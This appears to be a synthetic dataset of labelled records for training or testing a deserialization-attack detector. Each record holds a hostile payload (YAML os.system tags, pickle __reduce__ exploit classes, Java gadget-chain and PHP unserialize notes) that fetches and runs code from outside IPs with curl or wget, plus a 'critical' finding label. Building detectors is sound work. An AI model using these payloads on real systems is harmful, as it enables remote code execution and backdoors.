"synth_malicious_deserialization_00127", "source": "synthetic", "source_license": "generated", "text": "POST /api/import HTTP/1.1\nContent-Type: application/octet-stream\n\n!!python/object/apply:os.system\nargs: ['curl http://192.29.114.10/payload | bash']\n---\n!!python/object/new:subprocess.Popen\n- ['wget', 'http://125.29.94.31/backdoor', '-O', '/tmp/bd']", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "yaml", "payload": "!!python/object/apply:os.system\nargs: ['curl http://192.29.114.10/payload | bash']\n---\n!!python/object/new:subprocess.Popen\n- ['wget', 'http://125.29.94.31/backdoor', '-O', '/tmp/bd']"}}]} {"id": "synth_malicious_deserialization_00128", "source": "synthetic", "source_license": "generated", "text": "POST /api/import HTTP/1.1\nContent-Type: application/octet-stream\n\n!!python/object/apply:os.system\nargs: ['curl http://73.90.230.36/payload | bash']\n---\n!!python/object/new:subprocess.Popen\n- ['wget', 'http://244.248.156.181/backdoor', '-O', '/tmp/bd']", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "yaml", "payload": "!!python/object/apply:os.system\nargs: ['curl http://73.90.230.36/payload | bash']\n---\n!!python/object/new:subprocess.Popen\n- ['wget', 'http://244.248.156.181/backdoor', '-O', '/tmp/bd']"}}]} {"id": "synth_malicious_deserialization_00129", "source": "synthetic", "source_license": "generated", "text": "# Cache file contents\nrO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA==\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections6\n// Payload: Runtime.exec(\"curl http://223.103.48.103/shell\")", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "java", "payload": "rO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA==\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections6\n// Payload: Runtime.exec(\"curl http://223.103.48.103/shell\")"}}]} {"id": "synth_malicious_deserialization_00130", "source": "synthetic", "source_license": "generated", "text": "# Cache file contents\nimport pickle, base64\ndata = base64.b64decode('RgXCNvNPkPYJWeS4EoY9UlGNc70LjdgYmp6xeSaYsGKJIl7Xv47KMuA0NWHG')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n return (os.system, ('curl http://176.194.58.153/shell.sh | bash',))", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "pickle", "payload": "import pickle, base64\ndata = base64.b64decode('RgXCNvNPkPYJWeS4EoY9UlGNc70LjdgYmp6xeSaYsGKJIl7Xv47KMuA0NWHG')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n "}}]} {"id": "synth_malicious_deserialization_00131", "source": "synthetic", "source_license": "generated", "text": "# Cache file contents\n!!python/object/apply:os.system\nargs: ['curl http://128.146.68.229/payload | bash']\n---\n!!python/object/new:subprocess.Popen\n- ['wget', 'http://228.53.154.240/backdoor', '-O', '/tmp/bd']", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "yaml", "payload": "!!python/object/apply:os.system\nargs: ['curl http://128.146.68.229/payload | bash']\n---\n!!python/object/new:subprocess.Popen\n- ['wget', 'http://228.53.154.240/backdoor', '-O', '/tmp/bd']"}}]} {"id": "synth_malicious_deserialization_00132", "source": "synthetic", "source_license": "generated", "text": "# Cache file contents\nO:8:\"Exploit\":1:{s:4:\"data\";s:27:\"TalPVETQwBwKjsMCcSXtVV6SD/Z8R0XTd7O68/Yy\";}\n// PHP unserialize() payload\n// Chain: Monolog/RCE2\n// Target: system(\"id && wget http://62.14.207.101/bd\")", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "php", "payload": "O:8:\"Exploit\":1:{s:4:\"data\";s:27:\"TalPVETQwBwKjsMCcSXtVV6SD/Z8R0XTd7O68/Yy\";}\n// PHP unserialize() payload\n// Chain: Monolog/RCE2\n// Target: system(\"id && wget http://62.14.207.101/bd\")"}}]} {"id": "synth_malicious_deserialization_00133", "source": "synthetic", "source_license": "generated", "text": "# Cache file contents\nrO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA==\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections3\n// Payload: Runtime.exec(\"curl http://100.189.51.113/shell\")", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "java", "payload": "rO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA==\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections3\n// Payload: Runtime.exec(\"curl http://100.189.51.113/shell\")"}}]} {"id": "synth_malicious_deserialization_00134", "source": "synthetic", "source_license": "generated", "text": "# Cache file contents\nrO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA=\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections5\n// Payload: Runtime.exec(\"curl http://82.226.208.84/shell\")", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "java", "payload": "rO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA=\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections5\n// Payload: Runtime.exec(\"curl http://82.226.208.84/shell\")"}}]} {"id": "synth_malicious_deserialization_00135", "source": "synthetic", "source_license": "generated", "text": "# Cache file contents\nrO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA===\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections3\n// Payload: Runtime.exec(\"curl http://154.231.254.32/shell\")", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "java", "payload": "rO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA===\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections3\n// Payload: Runtime.exec(\"curl http://154.231.254.32/shell\")"}}]} {"id": "synth_malicious_deserialization_00136", "source": "synthetic", "source_license": "generated", "text": "POST /api/import HTTP/1.1\nContent-Type: application/octet-stream\n\n!!python/object/apply:os.system\nargs: ['curl http://217.172.13.123/payload | bash']\n---\n!!python/object/new:subprocess.Popen\n- ['wget', 'http://87.10.42.95/backdoor', '-O', '/tmp/bd']", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "yaml", "payload": "!!python/object/apply:os.system\nargs: ['curl http://217.172.13.123/payload | bash']\n---\n!!python/object/new:subprocess.Popen\n- ['wget', 'http://87.10.42.95/backdoor', '-O', '/tmp/bd']"}}]} {"id": "synth_malicious_deserialization_00137", "source": "synthetic", "source_license": "generated", "text": "# Found in uploaded file\nimport pickle, base64\ndata = base64.b64decode('+mthLOC3ec3fWeeyjEuhyXTAtLvqb4N7PHtjzDPqreN6Jkm4v+CuaSQcVupy')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n return (os.system, ('curl http://130.211.162.189/shell.sh | bash',))", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "pickle", "payload": "import pickle, base64\ndata = base64.b64decode('+mthLOC3ec3fWeeyjEuhyXTAtLvqb4N7PHtjzDPqreN6Jkm4v+CuaSQcVupy')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n "}}]} {"id": "synth_malicious_deserialization_00138", "source": "synthetic", "source_license": "generated", "text": "# Found in uploaded file\n!!python/object/apply:os.system\nargs: ['curl http://245.123.83.3/payload | bash']\n---\n!!python/object/new:subprocess.Popen\n- ['wget', 'http://204.83.95.90/backdoor', '-O', '/tmp/bd']", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "yaml", "payload": "!!python/object/apply:os.system\nargs: ['curl http://245.123.83.3/payload | bash']\n---\n!!python/object/new:subprocess.Popen\n- ['wget', 'http://204.83.95.90/backdoor', '-O', '/tmp/bd']"}}]} {"id": "synth_malicious_deserialization_00139", "source": "synthetic", "source_license": "generated", "text": "POST /api/import HTTP/1.1\nContent-Type: application/octet-stream\n\nimport pickle, base64\ndata = base64.b64decode('HTzueUBHMEU6ZOEZejJuFy4VVO5cmJTIeeMKe6azYKD2fZ/b/V/0bnsiLuQy')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n return (os.system, ('curl http://207.227.186.197/shell.sh | bash',))", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "pickle", "payload": "import pickle, base64\ndata = base64.b64decode('HTzueUBHMEU6ZOEZejJuFy4VVO5cmJTIeeMKe6azYKD2fZ/b/V/0bnsiLuQy')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n "}}]} {"id": "synth_malicious_deserialization_00140", "source": "synthetic", "source_license": "generated", "text": "# Found in uploaded file\nrO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA===\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections4\n// Payload: Runtime.exec(\"curl http://65.88.180.101/shell\")", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "java", "payload": "rO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA===\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections4\n// Payload: Runtime.exec(\"curl http://65.88.180.101/shell\")"}}]} {"id": "synth_malicious_deserialization_00141", "source": "synthetic", "source_license": "generated", "text": "POST /api/import HTTP/1.1\nContent-Type: application/octet-stream\n\nrO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA===\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections7\n// Payload: Runtime.exec(\"curl http://224.205.251.149/shell\")", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "java", "payload": "rO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA===\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections7\n// Payload: Runtime.exec(\"curl http://224.205.251.149/shell\")"}}]} {"id": "synth_malicious_deserialization_00142", "source": "synthetic", "source_license": "generated", "text": "# Cache file contents\nO:8:\"Exploit\":1:{s:4:\"data\";s:29:\"14yiDt8j1Tkf3H5lu+UKMxcP6768p5W2daxKS5Pm\";}\n// PHP unserialize() payload\n// Chain: Monolog/RCE1\n// Target: system(\"id && wget http://88.125.237.29/bd\")", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "php", "payload": "O:8:\"Exploit\":1:{s:4:\"data\";s:29:\"14yiDt8j1Tkf3H5lu+UKMxcP6768p5W2daxKS5Pm\";}\n// PHP unserialize() payload\n// Chain: Monolog/RCE1\n// Target: system(\"id && wget http://88.125.237.29/bd\")"}}]} {"id": "synth_malicious_deserialization_00143", "source": "synthetic", "source_license": "generated", "text": "# Found in uploaded file\nimport pickle, base64\ndata = base64.b64decode('89mZqitOgSgVHwWXB+RHDBOoT6WU9+NAeS/+moLVHwgWSerLficLkzK1ztUh')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n return (os.system, ('curl http://72.18.43.218/shell.sh | bash',))", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "pickle", "payload": "import pickle, base64\ndata = base64.b64decode('89mZqitOgSgVHwWXB+RHDBOoT6WU9+NAeS/+moLVHwgWSerLficLkzK1ztUh')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n "}}]} {"id": "synth_malicious_deserialization_00144", "source": "synthetic", "source_license": "generated", "text": "POST /api/import HTTP/1.1\nContent-Type: application/octet-stream\n\nrO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA===\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections5\n// Payload: Runtime.exec(\"curl http://93.247.67.202/shell\")", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "java", "payload": "rO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA===\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections5\n// Payload: Runtime.exec(\"curl http://93.247.67.202/shell\")"}}]} {"id": "synth_malicious_deserialization_00145", "source": "synthetic", "source_license": "generated", "text": "POST /api/import HTTP/1.1\nContent-Type: application/octet-stream\n\nimport pickle, base64\ndata = base64.b64decode('M8TsuXAQLTXsootedjLMQacxf3c0R/kMCV+xFJpQQxPZ0evP1SoWIWCcGX8E')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n return (os.system, ('curl http://108.84.105.100/shell.sh | bash',))", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "pickle", "payload": "import pickle, base64\ndata = base64.b64decode('M8TsuXAQLTXsootedjLMQacxf3c0R/kMCV+xFJpQQxPZ0evP1SoWIWCcGX8E')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n "}}]} {"id": "synth_malicious_deserialization_00146", "source": "synthetic", "source_license": "generated", "text": "# Cache file contents\nimport pickle, base64\ndata = base64.b64decode('mbM0Qc+MmLIVn9hLivKArYRGuQvtCWjuclQ0wMPDdz920BuObXeJfCUzNGQ5')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n return (os.system, ('curl http://254.34.94.128/shell.sh | bash',))", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "pickle", "payload": "import pickle, base64\ndata = base64.b64decode('mbM0Qc+MmLIVn9hLivKArYRGuQvtCWjuclQ0wMPDdz920BuObXeJfCUzNGQ5')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n "}}]} {"id": "synth_malicious_deserialization_00147", "source": "synthetic", "source_license": "generated", "text": "# Cache file contents\n!!python/object/apply:os.system\nargs: ['curl http://172.97.207.168/payload | bash']\n---\n!!python/object/new:subprocess.Popen\n- ['wget', 'http://121.131.137.167/backdoor', '-O', '/tmp/bd']", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "yaml", "payload": "!!python/object/apply:os.system\nargs: ['curl http://172.97.207.168/payload | bash']\n---\n!!python/object/new:subprocess.Popen\n- ['wget', 'http://121.131.137.167/backdoor', '-O', '/tmp/bd']"}}]} {"id": "synth_malicious_deserialization_00148", "source": "synthetic", "source_license": "generated", "text": "# Found in uploaded file\nO:8:\"Exploit\":1:{s:4:\"data\";s:25:\"XP17meVJjSsF1zJoYyOiXltO1ONlV8ps8LQDLc/w\";}\n// PHP unserialize() payload\n// Chain: Monolog/RCE2\n// Target: system(\"id && wget http://164.44.27.226/bd\")", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "php", "payload": "O:8:\"Exploit\":1:{s:4:\"data\";s:25:\"XP17meVJjSsF1zJoYyOiXltO1ONlV8ps8LQDLc/w\";}\n// PHP unserialize() payload\n// Chain: Monolog/RCE2\n// Target: system(\"id && wget http://164.44.27.226/bd\")"}}]} {"id": "synth_malicious_deserialization_00149", "source": "synthetic", "source_license": "generated", "text": "# Cache file contents\nO:8:\"Exploit\":1:{s:4:\"data\";s:80:\"yK+aK1i36cFvcTSgZxH8AjoqT41VNYI80qSud3GN\";}\n// PHP unserialize() payload\n// Chain: Monolog/RCE2\n// Target: system(\"id && wget http://54.129.54.180/bd\")", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "php", "payload": "O:8:\"Exploit\":1:{s:4:\"data\";s:80:\"yK+aK1i36cFvcTSgZxH8AjoqT41VNYI80qSud3GN\";}\n// PHP unserialize() payload\n// Chain: Monolog/RCE2\n// Target: system(\"id && wget http://54.129.54.180/bd\")"}}]} {"id": "synth_malicious_deserialization_00150", "source": "synthetic", "source_license": "generated", "text": "POST /api/import HTTP/1.1\nContent-Type: application/octet-stream\n\nrO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA=\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections1\n// Payload: Runtime.exec(\"curl http://65.69.170.242/shell\")", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "java", "payload": "rO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA=\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections1\n// Payload: Runtime.exec(\"curl http://65.69.170.242/shell\")"}}]} {"id": "synth_malicious_deserialization_00151", "source": "synthetic", "source_license": "generated", "text": "POST /api/import HTTP/1.1\nContent-Type: application/octet-stream\n\n!!python/object/apply:os.system\nargs: ['curl http://50.178.170.69/payload | bash']\n---\n!!python/object/new:subprocess.Popen\n- ['wget', 'http://102.250.108.220/backdoor', '-O', '/tmp/bd']", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "yaml", "payload": "!!python/object/apply:os.system\nargs: ['curl http://50.178.170.69/payload | bash']\n---\n!!python/object/new:subprocess.Popen\n- ['wget', 'http://102.250.108.220/backdoor', '-O', '/tmp/bd']"}}]} {"id": "synth_malicious_deserialization_00152", "source": "synthetic", "source_license": "generated", "text": "# Cache file contents\nO:8:\"Exploit\":1:{s:4:\"data\";s:71:\"0Igb4szVrjY+KkxfXoZ/Sh6l2H/FiFpbjLum3jbP\";}\n// PHP unserialize() payload\n// Chain: Monolog/RCE1\n// Target: system(\"id && wget http://89.46.57.186/bd\")", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "php", "payload": "O:8:\"Exploit\":1:{s:4:\"data\";s:71:\"0Igb4szVrjY+KkxfXoZ/Sh6l2H/FiFpbjLum3jbP\";}\n// PHP unserialize() payload\n// Chain: Monolog/RCE1\n// Target: system(\"id && wget http://89.46.57.186/bd\")"}}]} {"id": "synth_malicious_deserialization_00153", "source": "synthetic", "source_license": "generated", "text": "POST /api/import HTTP/1.1\nContent-Type: application/octet-stream\n\n!!python/object/apply:os.system\nargs: ['curl http://252.19.211.232/payload | bash']\n---\n!!python/object/new:subprocess.Popen\n- ['wget', 'http://2.151.131.149/backdoor', '-O', '/tmp/bd']", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "yaml", "payload": "!!python/object/apply:os.system\nargs: ['curl http://252.19.211.232/payload | bash']\n---\n!!python/object/new:subprocess.Popen\n- ['wget', 'http://2.151.131.149/backdoor', '-O', '/tmp/bd']"}}]} {"id": "synth_malicious_deserialization_00154", "source": "synthetic", "source_license": "generated", "text": "# Found in uploaded file\nimport pickle, base64\ndata = base64.b64decode('Cqry8SkEh09kgwekCgX3BiqbEiw99+Q6mhT7tY+UJjdXQw8UbVhP5WDYyxtT')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n return (os.system, ('curl http://96.107.104.50/shell.sh | bash',))", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "pickle", "payload": "import pickle, base64\ndata = base64.b64decode('Cqry8SkEh09kgwekCgX3BiqbEiw99+Q6mhT7tY+UJjdXQw8UbVhP5WDYyxtT')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n "}}]} {"id": "synth_malicious_deserialization_00155", "source": "synthetic", "source_license": "generated", "text": "# Cache file contents\nO:8:\"Exploit\":1:{s:4:\"data\";s:72:\"twShh9g13b4vfrR3GywJb8sBbH6fIjZTTo/m/+rh\";}\n// PHP unserialize() payload\n// Chain: Monolog/RCE3\n// Target: system(\"id && wget http://215.209.83.188/bd\")", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "php", "payload": "O:8:\"Exploit\":1:{s:4:\"data\";s:72:\"twShh9g13b4vfrR3GywJb8sBbH6fIjZTTo/m/+rh\";}\n// PHP unserialize() payload\n// Chain: Monolog/RCE3\n// Target: system(\"id && wget http://215.209.83.188/bd\")"}}]} {"id": "synth_malicious_deserialization_00156", "source": "synthetic", "source_license": "generated", "text": "# Found in uploaded file\nimport pickle, base64\ndata = base64.b64decode('ka7E0b3ONMGBJZ8EiZw1ve4UtyA0kKG5uojJmiAdO7K9CkkJIvILJKMd0k4V')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n return (os.system, ('curl http://247.5.233.253/shell.sh | bash',))", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "pickle", "payload": "import pickle, base64\ndata = base64.b64decode('ka7E0b3ONMGBJZ8EiZw1ve4UtyA0kKG5uojJmiAdO7K9CkkJIvILJKMd0k4V')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n "}}]} {"id": "synth_malicious_deserialization_00157", "source": "synthetic", "source_license": "generated", "text": "# Cache file contents\nO:8:\"Exploit\":1:{s:4:\"data\";s:73:\"HG4otMskSlN0WBYtE7EiquNDGRkWospMfeXsNznJ\";}\n// PHP unserialize() payload\n// Chain: Monolog/RCE1\n// Target: system(\"id && wget http://95.243.178.18/bd\")", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "php", "payload": "O:8:\"Exploit\":1:{s:4:\"data\";s:73:\"HG4otMskSlN0WBYtE7EiquNDGRkWospMfeXsNznJ\";}\n// PHP unserialize() payload\n// Chain: Monolog/RCE1\n// Target: system(\"id && wget http://95.243.178.18/bd\")"}}]} {"id": "synth_malicious_deserialization_00158", "source": "synthetic", "source_license": "generated", "text": "# Found in uploaded file\nO:8:\"Exploit\":1:{s:4:\"data\";s:53:\"2xHBgWiNWK1/DDJcgqFFT6F4lnmhzl5r/9+sAW68\";}\n// PHP unserialize() payload\n// Chain: Monolog/RCE2\n// Target: system(\"id && wget http://50.79.223.229/bd\")", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "php", "payload": "O:8:\"Exploit\":1:{s:4:\"data\";s:53:\"2xHBgWiNWK1/DDJcgqFFT6F4lnmhzl5r/9+sAW68\";}\n// PHP unserialize() payload\n// Chain: Monolog/RCE2\n// Target: system(\"id && wget http://50.79.223.229/bd\")"}}]} {"id": "synth_malicious_deserialization_00159", "source": "synthetic", "source_license": "generated", "text": "# Cache file contents\n!!python/object/apply:os.system\nargs: ['curl http://217.202.158.163/payload | bash']\n---\n!!python/object/new:subprocess.Popen\n- ['wget', 'http://121.60.189.203/backdoor', '-O', '/tmp/bd']", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "yaml", "payload": "!!python/object/apply:os.system\nargs: ['curl http://217.202.158.163/payload | bash']\n---\n!!python/object/new:subprocess.Popen\n- ['wget', 'http://121.60.189.203/backdoor', '-O', '/tmp/bd']"}}]} {"id": "synth_malicious_deserialization_00160", "source": "synthetic", "source_license": "generated", "text": "POST /api/import HTTP/1.1\nContent-Type: application/octet-stream\n\nimport pickle, base64\ndata = base64.b64decode('25LxCyvKbiVjZ61UG258bAzLQlgUln+uW3Q6N1DOKu2/CbhPu/CfwP0JAhMA')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n return (os.system, ('curl http://26.64.226.21/shell.sh | bash',))", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "pickle", "payload": "import pickle, base64\ndata = base64.b64decode('25LxCyvKbiVjZ61UG258bAzLQlgUln+uW3Q6N1DOKu2/CbhPu/CfwP0JAhMA')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n "}}]} {"id": "synth_malicious_deserialization_00161", "source": "synthetic", "source_license": "generated", "text": "# Found in uploaded file\nimport pickle, base64\ndata = base64.b64decode('qCXeiTFNl6C7bo07JJCQiPycDLDyFJF9HbBrj0pJ7Fvud9bNPbhOb7Z19Doi')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n return (os.system, ('curl http://155.162.186.95/shell.sh | bash',))", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "pickle", "payload": "import pickle, base64\ndata = base64.b64decode('qCXeiTFNl6C7bo07JJCQiPycDLDyFJF9HbBrj0pJ7Fvud9bNPbhOb7Z19Doi')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n "}}]} {"id": "synth_malicious_deserialization_00162", "source": "synthetic", "source_license": "generated", "text": "# Cache file contents\nO:8:\"Exploit\":1:{s:4:\"data\";s:36:\"5xucsW39vLahVrCgXC7FN4iSsLpH9DcN1LH6bZBo\";}\n// PHP unserialize() payload\n// Chain: Monolog/RCE2\n// Target: system(\"id && wget http://206.154.115.117/bd\")", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "php", "payload": "O:8:\"Exploit\":1:{s:4:\"data\";s:36:\"5xucsW39vLahVrCgXC7FN4iSsLpH9DcN1LH6bZBo\";}\n// PHP unserialize() payload\n// Chain: Monolog/RCE2\n// Target: system(\"id && wget http://206.154.115.117/bd\")"}}]} {"id": "synth_malicious_deserialization_00163", "source": "synthetic", "source_license": "generated", "text": "POST /api/import HTTP/1.1\nContent-Type: application/octet-stream\n\nimport pickle, base64\ndata = base64.b64decode('eVmNVjIve9KK1YV/JvFAlNY6aDOnqGhBUGrksCDauZlpTOEsJHcMqbuPBAY4')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n return (os.system, ('curl http://207.115.42.209/shell.sh | bash',))", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "pickle", "payload": "import pickle, base64\ndata = base64.b64decode('eVmNVjIve9KK1YV/JvFAlNY6aDOnqGhBUGrksCDauZlpTOEsJHcMqbuPBAY4')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n "}}]} {"id": "synth_malicious_deserialization_00164", "source": "synthetic", "source_license": "generated", "text": "POST /api/import HTTP/1.1\nContent-Type: application/octet-stream\n\nimport pickle, base64\ndata = base64.b64decode('Zfw/3uOGiApONV2pbYZwUBRdUMOllUDRv0cHlmMyoGsBls5nT2Sk4CnInSM4')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n return (os.system, ('curl http://246.18.235.218/shell.sh | bash',))", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "pickle", "payload": "import pickle, base64\ndata = base64.b64decode('Zfw/3uOGiApONV2pbYZwUBRdUMOllUDRv0cHlmMyoGsBls5nT2Sk4CnInSM4')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n "}}]} {"id": "synth_malicious_deserialization_00165", "source": "synthetic", "source_license": "generated", "text": "# Cache file contents\n!!python/object/apply:os.system\nargs: ['curl http://84.14.126.244/payload | bash']\n---\n!!python/object/new:subprocess.Popen\n- ['wget', 'http://38.252.161.132/backdoor', '-O', '/tmp/bd']", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "yaml", "payload": "!!python/object/apply:os.system\nargs: ['curl http://84.14.126.244/payload | bash']\n---\n!!python/object/new:subprocess.Popen\n- ['wget', 'http://38.252.161.132/backdoor', '-O', '/tmp/bd']"}}]} {"id": "synth_malicious_deserialization_00166", "source": "synthetic", "source_license": "generated", "text": "# Found in uploaded file\nimport pickle, base64\ndata = base64.b64decode('Kx0qCLwyNgFVk5K71nmrHM525hW9Ufhp8yWW3ZOZx05nxHQwJVM026J/zTw9')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n return (os.system, ('curl http://165.26.108.122/shell.sh | bash',))", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "pickle", "payload": "import pickle, base64\ndata = base64.b64decode('Kx0qCLwyNgFVk5K71nmrHM525hW9Ufhp8yWW3ZOZx05nxHQwJVM026J/zTw9')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n "}}]} {"id": "synth_malicious_deserialization_00167", "source": "synthetic", "source_license": "generated", "text": "# Cache file contents\nrO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA===\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections1\n// Payload: Runtime.exec(\"curl http://182.112.220.137/shell\")", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "java", "payload": "rO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA===\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections1\n// Payload: Runtime.exec(\"curl http://182.112.220.137/shell\")"}}]} {"id": "synth_malicious_deserialization_00168", "source": "synthetic", "source_license": "generated", "text": "# Found in uploaded file\nO:8:\"Exploit\":1:{s:4:\"data\";s:64:\"Ot+4PkK9C+T9iwjyxkf6u91vfIGfRFkmEmLsQG2s\";}\n// PHP unserialize() payload\n// Chain: Monolog/RCE1\n// Target: system(\"id && wget http://141.4.181.110/bd\")", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "php", "payload": 